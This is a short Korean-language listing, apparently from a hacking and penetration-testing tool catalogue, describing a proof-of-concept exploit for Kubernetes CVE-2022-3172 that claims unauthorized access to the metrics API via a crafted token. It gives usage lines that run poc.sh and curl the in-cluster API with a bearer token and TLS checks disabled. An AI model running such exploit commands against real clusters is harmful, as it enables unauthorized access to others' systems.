해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!
Kubernetes의 CVE-2022-3172에 대한 개념 증명 익스플로잇으로, 조작된 토큰을 통해 메트릭 API에 대한 무단 액세스를 시연합니다.
커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
모든 도구 탐색
도구 컬렉션을 둘러보세요
chmod +x poc.sh ./poc.sh
curl https://kubernetes.default.svc/apis/metrics.k8s.io/v2beta1/ -k -H "Authorization: Bearer {token}"